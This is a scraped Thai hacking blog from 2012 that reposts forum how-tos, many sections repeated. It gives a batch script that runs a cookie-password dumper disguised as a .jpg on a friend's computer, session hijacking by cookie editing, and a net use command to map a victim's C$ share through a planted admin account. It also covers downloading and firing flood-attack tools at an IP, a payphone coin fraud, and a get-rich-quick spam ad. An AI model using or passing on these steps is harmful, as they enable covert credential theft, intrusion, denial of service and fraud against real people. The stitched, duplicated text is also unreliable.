http://www.duckload.com/download/3162439/HackWireless.rar
http://www.duckload.com/download/3162453/WIRELESS.rar
http://www.duckload.com/download/3162485/_.rar
credit zeed5
ข้อมูลจาก ruk-com.in.th
วันพุธที่ 1 กุมภาพันธ์ พ.ศ. 2555
อยากรู้ไหมทำไม โนเกีย 1100 มือถือจอขาวดำจึงมีราคาพุ่งสูงถึงเครื่องละแสนบาท!
แต่เป็นจำเลยใหญ่ไปแล้วกับ “โนเกีย 1100″ มือ ถือจอขาวดำสุดคลาสสิก ฟีเจอร์สุดเบบี้ มีไฟฉายติดมาด้วย ถึงแม้จะตกรุ่นไปนานแล้ว แต่กำลังเป็นที่ต้องการอย่างมาก (อีกครั้ง) ในขณะนี้
อย่างไรก็ดี ด้วยความที่มันไม่มีลูกเล่นอะไรที่พิศดารเลยนี่เอง ประกอบกับราคาสุดถูงในบรรดามือถือแบรนด์โนเกียทั้งหมด จึงทำให้ “โนเกีย 1100″ มือถือที่เปิดตัวเมื่อ 6 ปีที่แล้วด้วยราคาหลัก 1000 บาทต้นๆ ในไทย กลายเป็นมือถือที่ขายไปทั่วโลก ขายไปแล้วกว่า 200 ล้านเครื่อง!!! และวันนี้มันก็มลายหายไปจากตลาดเป็นที่เรียบร้อย
แต่หารู้ไม่ว่า วันนี้ “โนเกีย 1100″ มีค่าหลักแสนบาท! ไม่ใช่เพราะผู้ออกแบบเสียชีวิตลง แต่เป็นเพราะมันคืออาวุธชิ้นสำคัญ ที่แฮคเกอร์จะคว้าเงินล้านลงกระเป๋าตัวเองได้ แต่สิ่งที่สำคัญมากๆ ก็คือ “โนเกีย 1100″ เครื่องนั้นจะต้องผลิตจากเมือง Bochum เยอรมัน เท่านั้น
อยากรู้ว่าทำไมจึงเป็นเช่นนั้น และพวกแฮคเกอร์จะใช้มือถือทรงแท่งหน้าตาเชยๆ นั้นทำอะไร เชิญกวาดตาไปบรรทัดต่อไปทันที!
วิธีการคือ เหล่าแฮคเกอร์จะนำมือถือรุ่นนี้ ผลิตจากที่เยอรมันนี่ มารันโปรแกรมลงไปใหม่ เพื่อให้มันสามารถใช้เบอร์เดียวกับมือถือเครื่องอื่นได้ นั่นก็หมายความว่า ข้อความ SMS ใดๆ ที่เบอร์มือถือต้นฉบับได้ มือถือโนเกีย 1100 เครื่องที่ก๊อปปี้มาก็จะได้รับเช่นเดียวกัน
สอนวิธีการ hack wireless ใช้แบบฟรีๆเลยครับ [หากซ้ำก้อขออภัย]
วันอังคารที่ 31 มกราคม พ.ศ. 2555
การแกะรอย(FingerPrint)
การที่ผู้บุกรุกจะกระทำการใดๆ กับเป้าหมายนั้น ส่วนใหญ่มักจะต้องมีกระบวนการในการสะสมข้อมูลเกี่ยวกับเป้าหมายนั้นๆ ก่อน จากนั้นจึงจะลงมือบุกรุกเข้าไปยังเป้าหมายที่ต้องการ และถ้าทำได้สำเร็จผู้บุกรุกอาจจะติดตั้งซอฟแวร์บางตัวเพื่อซ่อนร่องรอยหรือติดตั้ง backdoor ไว้ในระบบ เพื่อจะได้เข้ามาใช้งานได้ง่ายๆ ในครั้งต่อไป
ดังนั้นใครอยากได้การแกะรอยเอาไปศึกษาได้เลยครับ
ดังนั้นใครอยากได้การแกะรอยเอาไปศึกษาได้เลยครับ
โปรแกรม hack password (พวกการ login)
โปรแกรมนี้ชื่อ IEpass โปรแกรมแกรม hack cookie
บางคนจะไม่ค่อย ออกจากระบบ จะสามารถเอารหัสมาได้ง่ายดาย
โปรแกรม
http://www.uppicweb.com/show.php?id=2186212eafc3a0caad3f7be29207c97a
ถ้ามี cookie ในเครื่องมันจะแสดงออกมา
แต่สมมุติว่าไปบ้านเพื่อนแล้วเปิดโปรแกรมนี้ตอนเพื่อนอยู่ด้วยจะทำไม่ได้จึงมีวิธีที่ทำให้เอารหัสมาได้โดยไม่ผิดสังเกต
วิธีทำ
1.เปิด notepad
2.เพิ่มไปว่า @ echo off
ren 001.jpg 001.exe
001.jpg /stext 0001.jpg
ren 001.exe 001.jpg
end
3.แล้ว sever ชื่ออะไรก็ได้แต่ต้องลงท้ายด้วย .bat
4.โปรแกรมที่โหลดมาเปลียนชื่อเป็น 001.jpg แล้วเอาสองอันนี้ไปไว้ที่เดียวกัน
วิธีใช้
ไปที่เครื่องเพื่อนแล้วคลิกไฟล์ที่สร้าง ด้วย notepad มันจะใช้เวลา 2-3วิ เราจะได้ไฟล์อีกอันมาชื่อ 0001.jpg (ในนี้จะมีรหัสอยู่)
แล้วกลับบ้านไปเปิดไฟล์ 0001.jpg ด้วย notepad จะได้รหัสมาถ้าไม่มีไรอยู่ในไฟล์แสดงว่าเพื่อนออกจากระบบทุกครั้ง
ข้อมูลจาก ruk-com.in.th
บางคนจะไม่ค่อย ออกจากระบบ จะสามารถเอารหัสมาได้ง่ายดาย
โปรแกรม
http://www.uppicweb.com/show.php?id=2186212eafc3a0caad3f7be29207c97a
ถ้ามี cookie ในเครื่องมันจะแสดงออกมา
แต่สมมุติว่าไปบ้านเพื่อนแล้วเปิดโปรแกรมนี้ตอนเพื่อนอยู่ด้วยจะทำไม่ได้จึงมีวิธีที่ทำให้เอารหัสมาได้โดยไม่ผิดสังเกต
วิธีทำ
1.เปิด notepad
2.เพิ่มไปว่า @ echo off
ren 001.jpg 001.exe
001.jpg /stext 0001.jpg
ren 001.exe 001.jpg
end
3.แล้ว sever ชื่ออะไรก็ได้แต่ต้องลงท้ายด้วย .bat
4.โปรแกรมที่โหลดมาเปลียนชื่อเป็น 001.jpg แล้วเอาสองอันนี้ไปไว้ที่เดียวกัน
วิธีใช้
ไปที่เครื่องเพื่อนแล้วคลิกไฟล์ที่สร้าง ด้วย notepad มันจะใช้เวลา 2-3วิ เราจะได้ไฟล์อีกอันมาชื่อ 0001.jpg (ในนี้จะมีรหัสอยู่)
แล้วกลับบ้านไปเปิดไฟล์ 0001.jpg ด้วย notepad จะได้รหัสมาถ้าไม่มีไรอยู่ในไฟล์แสดงว่าเพื่อนออกจากระบบทุกครั้ง
ข้อมูลจาก ruk-com.in.th
มาเลือกทางเดินกันก่อนครับ
Hacker กับหมวกสองใบที่ต้องเลือก
hackerแฮกเกอร์ความหมายเดิมจะหมายถึงนักโปรแกรมที่มีความสนใจหรือความเชี่ยวชาญอย่างลึกซึ้งในระบบคอมพิวเตอร์ถ้าเป็นนักโปรแกรมทั่วไปก็จะสนใจเพียงแค่ว่าทำโปรแกรมให้เสร็จและใช้งานได้ตามต้องการเท่านั้นแต่พวกแฮกเกอร์จะชอบคิดค้นหาวิธีการแปลกๆใหม่ๆ เพื่อให้โปรแกรมทำงานด้วยประสิทธิภาพสูงสุด หรือชอบแก้ไขปัญหาที่ซับซ้อนยุ่งยาก เป็นโปรแกรมเมอร์ที่หมกมุ่นอยู่กับการปรับปรุงโปรแกรมให้ทำงานได้ดีขึ้น ซึ่งหมายรวมถึงผู้เชี่ยวชาญทางด้านโปรแกรมด้วย
cracker แคร็กเกอร์คือผู้ที่หาทางเจาะเข้าสู่ระบบคอมพิวเตอร์ต่างๆโดยไม่ได้รับอนุญาต อาจจะเพื่อความสนุก หรือเพื่อการโจรกรรมและทำลายข้อมูลเป็นคำที่ใช้แทนคำว่า แฮกเกอร์ เพื่อให้คำว่าแฮกเกอร์ยังคงความหมายเดิมว่าเป็นผู้ที่เชี่ยวชาญด้านโปรแกรม และแก้ปัญหาคอมพิวเตอร์ได้เก่ง
แต่ในปัจจุบันนิยม ใช้คำว่าแฮกเกอร์ในความหมายว่าเป็นผู้ที่พยายาม ทำลายการรักษาความปลอดภัย ในระบบคอมพิวเตอร์และเพื่อป้องกันความสับสนเมื่อผู้อ่านต้องไปอ่านเรื่องราว ของแฮกเกอร์ในบทความเรื่องอื่นๆ ผู้เขียนจึงขอใช้คำว่าแฮกเกอร์ในความหมายดังกล่าวนี้
- แฮกเกอร์หมวกดำ (black hat hacker) /แครกเกอร์(Cracker) จัดว่าเป็นแฮกเกอร์ฝ่ายอธรรม นิยมใช้ความสามารถเฉพาะตัวไปในทางที่ผิด มีเจตนามุ่งร้าย ทำให้เกิดปัญหาในระบบคอมพิวเตอร์เป็นแฮกเกอร์ที่เจาะระบบอย่างผิดกฎหมายและสร้างความเสียหายให้เกิดขึ้นใน ระบบข้อมูลคอมพิวเตอร์ ซึ่งแฮกเกอร์ในกลุ่มนี้เป็นกลุ่มที่สร้างความยุ่งยากให้แก่ผู้ที่ดูแลความ ปลอดภัยของระบบคอมพิวเตอร์เป็นอย่างยิ่ง
hackerแฮกเกอร์ความหมายเดิมจะหมายถึงนักโปรแกรมที่มีความสนใจหรือความเชี่ยวชาญอย่างลึกซึ้งในระบบคอมพิวเตอร์ถ้าเป็นนักโปรแกรมทั่วไปก็จะสนใจเพียงแค่ว่าทำโปรแกรมให้เสร็จและใช้งานได้ตามต้องการเท่านั้นแต่พวกแฮกเกอร์จะชอบคิดค้นหาวิธีการแปลกๆใหม่ๆ เพื่อให้โปรแกรมทำงานด้วยประสิทธิภาพสูงสุด หรือชอบแก้ไขปัญหาที่ซับซ้อนยุ่งยาก เป็นโปรแกรมเมอร์ที่หมกมุ่นอยู่กับการปรับปรุงโปรแกรมให้ทำงานได้ดีขึ้น ซึ่งหมายรวมถึงผู้เชี่ยวชาญทางด้านโปรแกรมด้วย
cracker แคร็กเกอร์คือผู้ที่หาทางเจาะเข้าสู่ระบบคอมพิวเตอร์ต่างๆโดยไม่ได้รับอนุญาต อาจจะเพื่อความสนุก หรือเพื่อการโจรกรรมและทำลายข้อมูลเป็นคำที่ใช้แทนคำว่า แฮกเกอร์ เพื่อให้คำว่าแฮกเกอร์ยังคงความหมายเดิมว่าเป็นผู้ที่เชี่ยวชาญด้านโปรแกรม และแก้ปัญหาคอมพิวเตอร์ได้เก่ง
แต่ในปัจจุบันนิยม ใช้คำว่าแฮกเกอร์ในความหมายว่าเป็นผู้ที่พยายาม ทำลายการรักษาความปลอดภัย ในระบบคอมพิวเตอร์และเพื่อป้องกันความสับสนเมื่อผู้อ่านต้องไปอ่านเรื่องราว ของแฮกเกอร์ในบทความเรื่องอื่นๆ ผู้เขียนจึงขอใช้คำว่าแฮกเกอร์ในความหมายดังกล่าวนี้
- แฮกเกอร์หมวกดำ (black hat hacker) /แครกเกอร์(Cracker) จัดว่าเป็นแฮกเกอร์ฝ่ายอธรรม นิยมใช้ความสามารถเฉพาะตัวไปในทางที่ผิด มีเจตนามุ่งร้าย ทำให้เกิดปัญหาในระบบคอมพิวเตอร์เป็นแฮกเกอร์ที่เจาะระบบอย่างผิดกฎหมายและสร้างความเสียหายให้เกิดขึ้นใน ระบบข้อมูลคอมพิวเตอร์ ซึ่งแฮกเกอร์ในกลุ่มนี้เป็นกลุ่มที่สร้างความยุ่งยากให้แก่ผู้ที่ดูแลความ ปลอดภัยของระบบคอมพิวเตอร์เป็นอย่างยิ่ง
วันจันทร์ที่ 30 มกราคม พ.ศ. 2555
ตำนาน Hacker (เผื่อคนม่ะรู้นะคับ)
8) 8) 8)
Credit
คัมภีร์สยบแฮกเกอร์ (#4)
http://www.pantip.com/tech/internet/topic/IT1062643.html
Credit
คัมภีร์สยบแฮกเกอร์ (#4)
http://www.pantip.com/tech/internet/topic/IT1062643.html
Cookie Manipulation การทำง่ายๆนะครับ
Cookie Manipulation การปรับเปลี่ยน Cookie เพื่อเข้าระบบของคนอื่น
-ปรับเปลี่ยน/โยกย้าย ข้อมูลที่ส่งทาง Cookie
-ข้อมูลที่มักจะถูกส่งทาง Cookies ส่วนใหญ่ได้แก่
-Session ID
-User ID
-Password
-เปลี่ยน Session ID หรือ User ID ใน Cookie เพื่อเข้าถึงระบบด้วยสิทธิ์ของผู้ใช้อื่น
-เครื่องมือที่ใช้ในการแก้ไข Cookie หาง่ายใน Google ครับ
-Cookie Editor (Add-Ons บนบราวเซอร์ Firefox)
- Acunetix - HTTP Editor
- Acunetix - HTTP Fuzzer
วิธีการทำครับ
Nothing for guest!
แบ่งปันกันครับขอแค่คำขอบคุณ
ข้อมูลจาก ruk-com.in.th
-ปรับเปลี่ยน/โยกย้าย ข้อมูลที่ส่งทาง Cookie
-ข้อมูลที่มักจะถูกส่งทาง Cookies ส่วนใหญ่ได้แก่
-Session ID
-User ID
-Password
-เปลี่ยน Session ID หรือ User ID ใน Cookie เพื่อเข้าถึงระบบด้วยสิทธิ์ของผู้ใช้อื่น
-เครื่องมือที่ใช้ในการแก้ไข Cookie หาง่ายใน Google ครับ
-Cookie Editor (Add-Ons บนบราวเซอร์ Firefox)
- Acunetix - HTTP Editor
- Acunetix - HTTP Fuzzer
วิธีการทำครับ
Nothing for guest!
แบ่งปันกันครับขอแค่คำขอบคุณ
ข้อมูลจาก ruk-com.in.th
การขโมยข้อมูล (Pilfering)
หัวข้อนี้ก็ไม่ได้มีอะไรสำคัญอีกเหมือนกัน เพียงแต่ ต้องหัดเป็นคนสังเกตุ และก็ งก นิดๆ เหอๆ "ทำไมผมพูดแบบนี้"
ถ้าคุณนั้นสามารถเข้าไปดูไฟล์ต่างๆจากเครื่องเหยื่อได้แล้ว (MapDrive) คุณสามารถที่จะเห็นไฟล์ข้อมูลต่างๆเช่น ไฟล์งานทั่วๆไป ไฟล์ที่เก็บpassword ไฟล์ข้อมูลของบุคคลอื่นๆ ถ้าใส่ใจกับสิ่งแวดล้อมในไฟล์ข้อมูล คุณอาจได้ประโยชน์มากกว่าที่คิดเสียอีก แต่ก็อย่าลืมเรื่องเวลาด้วยนะ อย่าไปเกาะเครื่องเหยื่อนานจนเกินไป เหยื่อคุณอาจไม่หมูก็ได้ และจะโดนสวนกลับ จนหงายเก๋ง
ลองคิดดูว่าถ้าเป็นบริษัทที่มีการแข่งขันกัน อย่างการประมูลราคางานต่างๆ ถ้าโชคดีเข้าไปดูไฟล์ที่บริษัทคู่แข่งส่งประมูล คิดดูว่าบริษัทผมจะได้เปรียบขนาดไหน เวลายื่นซองประมูลงาน เงินที่ผมประมูลต่างจากบริษัทคู่แข่งแค่ 10 บาท เพียงแค่นี้กลายเป็นว่าบริษัทผมชนะการประมูล คิกๆ เรื่องข้อมูล สมัยนี้ถือว่าสำคัญมากๆ เอาเป็นว่าถ้าใครมีข้อมูลเยอะกว่า แน่นอนกว่า จะได้เปรียบมากกว่า จริงมั้ยครับ แต่ผมมักสนใจกับไฟล์รูปมากกว่าอ่า.... ไม่โหดพอ
การ Map Drive
และหลังจากที่คุณได้สร้าง User Admin ในเครื่องเหยื่อได้แล้วที่ชื่อ hacker และมี password เป็น passhack และก่อนหน้านี้คุณได้แสกนเครื่องเหยื่อแล้วว่าเครื่องเหยื่อได้เปิด share ที่ไดร์ฟ C: (ถ้า งง กลับไปอ่านเรื่อง scan ใหม)ให้คุณพิมพ์คำสั่งด้านล่างนี้เพื่อเข้าไป MapDrive C: ของเครื่องเหยื่อ
net use \\ 203.114.234.5 \ C$ passhack /u:hacker
ถ้าคุณนั้นสามารถเข้าไปดูไฟล์ต่างๆจากเครื่องเหยื่อได้แล้ว (MapDrive) คุณสามารถที่จะเห็นไฟล์ข้อมูลต่างๆเช่น ไฟล์งานทั่วๆไป ไฟล์ที่เก็บpassword ไฟล์ข้อมูลของบุคคลอื่นๆ ถ้าใส่ใจกับสิ่งแวดล้อมในไฟล์ข้อมูล คุณอาจได้ประโยชน์มากกว่าที่คิดเสียอีก แต่ก็อย่าลืมเรื่องเวลาด้วยนะ อย่าไปเกาะเครื่องเหยื่อนานจนเกินไป เหยื่อคุณอาจไม่หมูก็ได้ และจะโดนสวนกลับ จนหงายเก๋ง
ลองคิดดูว่าถ้าเป็นบริษัทที่มีการแข่งขันกัน อย่างการประมูลราคางานต่างๆ ถ้าโชคดีเข้าไปดูไฟล์ที่บริษัทคู่แข่งส่งประมูล คิดดูว่าบริษัทผมจะได้เปรียบขนาดไหน เวลายื่นซองประมูลงาน เงินที่ผมประมูลต่างจากบริษัทคู่แข่งแค่ 10 บาท เพียงแค่นี้กลายเป็นว่าบริษัทผมชนะการประมูล คิกๆ เรื่องข้อมูล สมัยนี้ถือว่าสำคัญมากๆ เอาเป็นว่าถ้าใครมีข้อมูลเยอะกว่า แน่นอนกว่า จะได้เปรียบมากกว่า จริงมั้ยครับ แต่ผมมักสนใจกับไฟล์รูปมากกว่าอ่า.... ไม่โหดพอ
การ Map Drive
และหลังจากที่คุณได้สร้าง User Admin ในเครื่องเหยื่อได้แล้วที่ชื่อ hacker และมี password เป็น passhack และก่อนหน้านี้คุณได้แสกนเครื่องเหยื่อแล้วว่าเครื่องเหยื่อได้เปิด share ที่ไดร์ฟ C: (ถ้า งง กลับไปอ่านเรื่อง scan ใหม)ให้คุณพิมพ์คำสั่งด้านล่างนี้เพื่อเข้าไป MapDrive C: ของเครื่องเหยื่อ
net use \\ 203.114.234.5 \ C$ passhack /u:hacker
วันอาทิตย์ที่ 29 มกราคม พ.ศ. 2555
ถึงเพื่อน ๆ ที่อยากเป็น Hacker !!
โลกเราเองเกิดขึ้นมาไม่รู้กี่ร้อยกี่พันล้านปีมาแล้ว.. อันนั้นไกลเกินไป..
แต่ทุก ๆ ช่วงเวลามีการพัฒนาและมีการเปลี่ยนแปลงตลอดเวลา !!
เมื่อเราเกิดมาแล้วเราก็อยากมีส่วนร่วมในการพัฒนาประเทศชาติ !!
การ ที่เพื่อน ๆ ทุกคนอยากเป็น hacker นั้น เป็นเรื่องดี เพราะอย่างน้อยมันมีคำถามในใจว่า สิ่งนั้นมันทำอะไร มันมีหลักการอย่างไร จะทำอย่างไรที่จะใช้งานมันได้ !!
คราวนี้เมื่อพิจารณาแล้ว hacker แท้จริงต้องเป็นผู้ที่มีประสบการณ์ในเชิงคอมพิวเตอร์สูง..
ถ้า เพื่อน ๆ ใช้ Visual Basic โดยไม่เคยเขียน C/C++ เพื่อน ๆ ก็จะไม่มีทางรู้ได้ว่า ฟังก์ชั่นที่พวกเรา Call นั้นเราจะสร้างมันขึ้นมาใช้อย่างไร !!
ถ้าพวกเรารู้จัก C/C++ แต่พวกเราไม่เคยเขียน Assembly พวกเราก็ไม่รู้ว่าภาย CPU มี Instruction Sets อะไรบ้าง ? เราจะเข้าถึงส่วนสำคัญต่าง ๆ ของฮาร์ดแวร์ได้อย่างไร เช่นอ่าน Sector แรกของ DISK ต่าง ๆ เช่น HDD, FDD ได้อย่าไงไร ? // นี่แบบพื้นฐานที่สุดแล้ว //
ถ้าเราไม่รู้ ในแต่ละชั้น มันก็เกิดการพอกพูนสิ่งไม่รู้เกิดขึ้นเรื่อย ๆ !!
ดัง นั้น HACKER จึงมักเป็นผู้รู้อย่างชัดเจนในแต่ละระดับ ว่าสามารถหรือไม่สามารถทำสิ่งนี้ได้ !! เมื่อรู้ว่าไม่สามารถทำสิ่งนี้ ในระดับนี้ ต้องลงไปในระดับที่ลึกเข้าไป.. เช่น เข้าไปสู่ C/C++ แล้วจึงอิมพลิเมนต์อะไรบางอย่างออกมาเพื่อแก้ปัญหา..
การโกงเครื่องโทรศัทพ์ตู้ จากคุณ อย่างเทพ
บทความยังเป็นเรื่องเกี่ยวกับโทรศัพท์สาธารณะอยู่ ฮุฮุ แต่ว่าอันนี้ยังใช้ได้แน่นอน
อุปกรณ์ที่ใช้ เหรียญ 1 บาท ,เหรียญ 10 บาท, และตู้โทรศัพท์นะท่าน แต่ต้องเป็นตู้ที่ที่หยอดเหรียญ
เป็นแนวตั้งเท่านั้น แนวนอนทำไม่ได้ วิธีคือ ให้วางเหรียญบาทกับเหรียญสิบต่อกัน โดยเหรียญบาท
จะต้องแย่เข้าตรงที่หยอดเหรียญประมาณครึ่งเหรียญ ส่วนเหรียญสิบจะเข้าไปนิดเดียว
แต่ยังไม่ได้หยอดลงตู้นะ แล้วให้ทำการปั่นเหรียญ 10 ขึ้นข้างบน แรงๆ (เดี๋ยวจะงง นึกถึงท่าตบหัวเพื่อน เหมือนกันเลย)
เหรียญ 10 กับเหรียญ 1 บาทจะตกไปพร้อมกัน แต่ผลที่ได้คือ เหรียญ 10 จะตกลงมา แต่เหรียญ 1 บาท
จะอยู่ในตู้ ค่าที่ได้หน้าตู้คือ 10 บาท เสียไปแค่ 1 บาทเท่านั้นเอง
ลองไปทำดูแต่ระวังโดนจับด้วยนะท่าน เดี๋ยวหาว่าไม่เตือน ฮุฮุ
--------------------
ข้อมูลจาก ruk-com.in.th
อุปกรณ์ที่ใช้ เหรียญ 1 บาท ,เหรียญ 10 บาท, และตู้โทรศัพท์นะท่าน แต่ต้องเป็นตู้ที่ที่หยอดเหรียญ
เป็นแนวตั้งเท่านั้น แนวนอนทำไม่ได้ วิธีคือ ให้วางเหรียญบาทกับเหรียญสิบต่อกัน โดยเหรียญบาท
จะต้องแย่เข้าตรงที่หยอดเหรียญประมาณครึ่งเหรียญ ส่วนเหรียญสิบจะเข้าไปนิดเดียว
แต่ยังไม่ได้หยอดลงตู้นะ แล้วให้ทำการปั่นเหรียญ 10 ขึ้นข้างบน แรงๆ (เดี๋ยวจะงง นึกถึงท่าตบหัวเพื่อน เหมือนกันเลย)
เหรียญ 10 กับเหรียญ 1 บาทจะตกไปพร้อมกัน แต่ผลที่ได้คือ เหรียญ 10 จะตกลงมา แต่เหรียญ 1 บาท
จะอยู่ในตู้ ค่าที่ได้หน้าตู้คือ 10 บาท เสียไปแค่ 1 บาทเท่านั้นเอง
ลองไปทำดูแต่ระวังโดนจับด้วยนะท่าน เดี๋ยวหาว่าไม่เตือน ฮุฮุ
--------------------
ข้อมูลจาก ruk-com.in.th
วันเสาร์ที่ 28 มกราคม พ.ศ. 2555
อยากเป็นวัยรุ่นที่เฟิร์สคลาส ใช้เงินแบบไม่ต้องดูราคา หรือ มีชีวิตที่ไร้ขีดจำกัด
อยากเป็นวัยรุ่นที่เฟิร์สคลาส ใช้เงินแบบไม่ต้องดูราคา หรือ มีชีวิตที่ไร้ขีดจำกัด ถ้าคุณเป็นอย่างที่ว่ามานั้น คุณได้พบโอกาสแล้ว The First Power System ระบบที่เจ๋งที่สุดตอนนี้ รายได้ที่คิดให้เราทุกวันแล้วก็โอนเงินให้เราทุกอาทิตย์ จะดีแค่ไหนที่เงินไม่ต้องช๊อตตลอดเวลา สนใจคลิ๊ก !
>>>>> http://122.155.5.134/~zp4247/ <<<<<
>>>>> http://122.155.5.134/~zp4247/ <<<<<
>>>>> http://122.155.5.134/~zp4247/ <<<<<
หรือติดต่อ
PIN BB : 23979EA5
โทรศัพท์ : 086-410-0566
ข้อมูลจาก ruk-com.in.th
>>>>> http://122.155.5.134/~zp4247/ <<<<<
>>>>> http://122.155.5.134/~zp4247/ <<<<<
>>>>> http://122.155.5.134/~zp4247/ <<<<<
หรือติดต่อ
PIN BB : 23979EA5
โทรศัพท์ : 086-410-0566
ข้อมูลจาก ruk-com.in.th
สำหรับ ชาว Hacker มือใหม่ หัดขับ
หลังจากหายหน้าหายไปตั้งนานวันนี้เลยมีบทความมาฝากครับ :)
บทความที่น่าสนใจสำหรับชาว hack มือใหม่หัดขับ
เป็นบทความที่น่าสนใจนะครับผมเลยไปเอามาลงให้
Computer Laboratory:ระบบเครือข่าย กับ เวิลด์ไวด์เว็บ และ ความปลอดภัย
โดย ดร. ธีรเกียรติ์ เกิดเจริญ
--------------------------------------------------------------------------------
วัตถุประสงค์
เพื่อให้นักศึกษามีความรู้ ความเข้าใจในการทำงานของระบบเน็ตเวอร์ค และ อินเตอร์เน็ตในระดับพื้นฐาน
เพื่อให้นักศึกษาสามารถต่อคอมพิวเตอร์ เข้ากับระบบอินเตอร์เน็ตได้ด้วยตนเอง
เพื่อให้นักศึกษาเรียนรู้การทำงานของ TCP/IP และ HTTP พร้อมทั้งสามารถติดตั้ง Web Server ได้ด้วยตัวเอง
เพื่อให้นักศึกษารู้จักเรื่องของความปลอดภัยในการใช้ ระบบเครือข่าย
--------------------------------------------------------------------------------
สิ่งที่คาดว่าจะได้รับ
หลังจากปฏิบัติการนี้แล้วนักศึกษาเข้าใจว่า ทำไมอินเตอร์เน็ตจึงประสบความสำเร็จกว่าเน็ตเวอร์คอื ่นอย่างเช่น Microsoft networks หรือ Novell
นักศึกษาสามารถเฝ้ามองการทำงานของเน็ตเวอร์ค รู้ว่าข้อมูลไหลไปมาอย่างไร
นักศึกษาเข้าใจการทำงานของ World Wide Web มากขึ้นในรายละเอียด
สามารถติดตั้งให้เครื่องคอมพิวเตอร์ใช้งานอินเตอร์เน ็ตได้ และสามารถติดตั้ง Web Server ได้
รู้จักการระมัดระวังในการใช้เครือข่ายอย่างปลอดภัย
บทความที่น่าสนใจสำหรับชาว hack มือใหม่หัดขับ
เป็นบทความที่น่าสนใจนะครับผมเลยไปเอามาลงให้
Computer Laboratory:ระบบเครือข่าย กับ เวิลด์ไวด์เว็บ และ ความปลอดภัย
โดย ดร. ธีรเกียรติ์ เกิดเจริญ
--------------------------------------------------------------------------------
วัตถุประสงค์
เพื่อให้นักศึกษามีความรู้ ความเข้าใจในการทำงานของระบบเน็ตเวอร์ค และ อินเตอร์เน็ตในระดับพื้นฐาน
เพื่อให้นักศึกษาสามารถต่อคอมพิวเตอร์ เข้ากับระบบอินเตอร์เน็ตได้ด้วยตนเอง
เพื่อให้นักศึกษาเรียนรู้การทำงานของ TCP/IP และ HTTP พร้อมทั้งสามารถติดตั้ง Web Server ได้ด้วยตัวเอง
เพื่อให้นักศึกษารู้จักเรื่องของความปลอดภัยในการใช้ ระบบเครือข่าย
--------------------------------------------------------------------------------
สิ่งที่คาดว่าจะได้รับ
หลังจากปฏิบัติการนี้แล้วนักศึกษาเข้าใจว่า ทำไมอินเตอร์เน็ตจึงประสบความสำเร็จกว่าเน็ตเวอร์คอื ่นอย่างเช่น Microsoft networks หรือ Novell
นักศึกษาสามารถเฝ้ามองการทำงานของเน็ตเวอร์ค รู้ว่าข้อมูลไหลไปมาอย่างไร
นักศึกษาเข้าใจการทำงานของ World Wide Web มากขึ้นในรายละเอียด
สามารถติดตั้งให้เครื่องคอมพิวเตอร์ใช้งานอินเตอร์เน ็ตได้ และสามารถติดตั้ง Web Server ได้
รู้จักการระมัดระวังในการใช้เครือข่ายอย่างปลอดภัย
โปรแกรม Flood Attack ที่ควรรู้
ดาวโหลด Shooter.exe
ดาวโหลด Attack 2.5.exe
ดาวโหลด Attack Server
ดาวโหลด ActivePerl-5.10.0.1004
วิธีติดตั้งสคริป
ติดตั้งโปรแกรม ActivePerl-5.10.0.1004
นำ Config.pl ที่แตกไฟร์แล้ว ไปวางไว้ที่ C:\WINDOWS\system32\drivers\etc
สร้างโฟเดอร์ Logfile ที่ C:\
วิธีใช้ยิง
ดับเบิลคลิกที่ Shooter.exe หรือ Attack.exe
นำหมายเลข IP ที่จะยิง ใส่ที่ช่อง Enter IP :
จากนั้นกด Enter
***หมายเหตุ
ทุกคนคงจะถาม คำถามนี้อยู่เสมอว่า ทำไมถึง ยิงแล้วไม่หลุด เพราะว่า เครื่องตามบ้านเขาใช้เน็ต ADSL มันหมดแล้ว ตอนนี้
ความเร็วต่ำสุดอยู่ที่ 6MB ใช้เน็ตธรรมดาคงไม่หลุดหลอก :R
ดาวโหลด Attack 2.5.exe
ดาวโหลด Attack Server
ดาวโหลด ActivePerl-5.10.0.1004
วิธีติดตั้งสคริป
ติดตั้งโปรแกรม ActivePerl-5.10.0.1004
นำ Config.pl ที่แตกไฟร์แล้ว ไปวางไว้ที่ C:\WINDOWS\system32\drivers\etc
สร้างโฟเดอร์ Logfile ที่ C:\
วิธีใช้ยิง
ดับเบิลคลิกที่ Shooter.exe หรือ Attack.exe
นำหมายเลข IP ที่จะยิง ใส่ที่ช่อง Enter IP :
จากนั้นกด Enter
***หมายเหตุ
ทุกคนคงจะถาม คำถามนี้อยู่เสมอว่า ทำไมถึง ยิงแล้วไม่หลุด เพราะว่า เครื่องตามบ้านเขาใช้เน็ต ADSL มันหมดแล้ว ตอนนี้
ความเร็วต่ำสุดอยู่ที่ 6MB ใช้เน็ตธรรมดาคงไม่หลุดหลอก :R
วันพฤหัสบดีที่ 26 มกราคม พ.ศ. 2555
คุณคิดแบบผมเปล่า ไม่มีคอมก็สามารถ hack ได้
ในที่นี้ไม่หมายถึงว่าจะ ไม่ใช้อุปกรณ์น่ะ
แบบเราปิดคอมไปแล้ว เราก็สำรวจดีแล้วว่ามันไฟสวิทคอมดับปิดไปแล้ว แล้วถอดปักแล้ว
พอผมตื่นเช้ามาเล่นคอม ปรากฎว่ามีไฟกระพริบหลายจุด เปิดคอมขึ้นปรากฎว่ามัน เป็นโหมด stanby
แล้วอีกเรื่อง ถ้าคุณไม่ใช่ hack แบบเก่าจริงๆ อย่างแสดงตัวตน
เพราะคุณอาจจะโดนแบบผม >:( >:(
แล้วผมก็ไม่รู้เหมือนคนโดนแบบผม แล้วถ้าขายคอมพิวเตอร์ด้วยแล้ว จะต้องดับวูวไปเลยหรือเปล่า
และสิ่งก็เป็นที่มาของความอยากรู้เกี่ยวกับการ hacker
คอมเครื่องที่ผมใช้อยู่นี้ผมก็ซื้อมาใหม่ ใช้ได้ วันสองวัน ก็โดนซ่ะแล้ว คอมเครื่องเก่า harddisk พังยังไม่ได้ไปซ่อม
ข้อมูลจาก ruk-com.in.th
แบบเราปิดคอมไปแล้ว เราก็สำรวจดีแล้วว่ามันไฟสวิทคอมดับปิดไปแล้ว แล้วถอดปักแล้ว
พอผมตื่นเช้ามาเล่นคอม ปรากฎว่ามีไฟกระพริบหลายจุด เปิดคอมขึ้นปรากฎว่ามัน เป็นโหมด stanby
แล้วอีกเรื่อง ถ้าคุณไม่ใช่ hack แบบเก่าจริงๆ อย่างแสดงตัวตน
เพราะคุณอาจจะโดนแบบผม >:( >:(
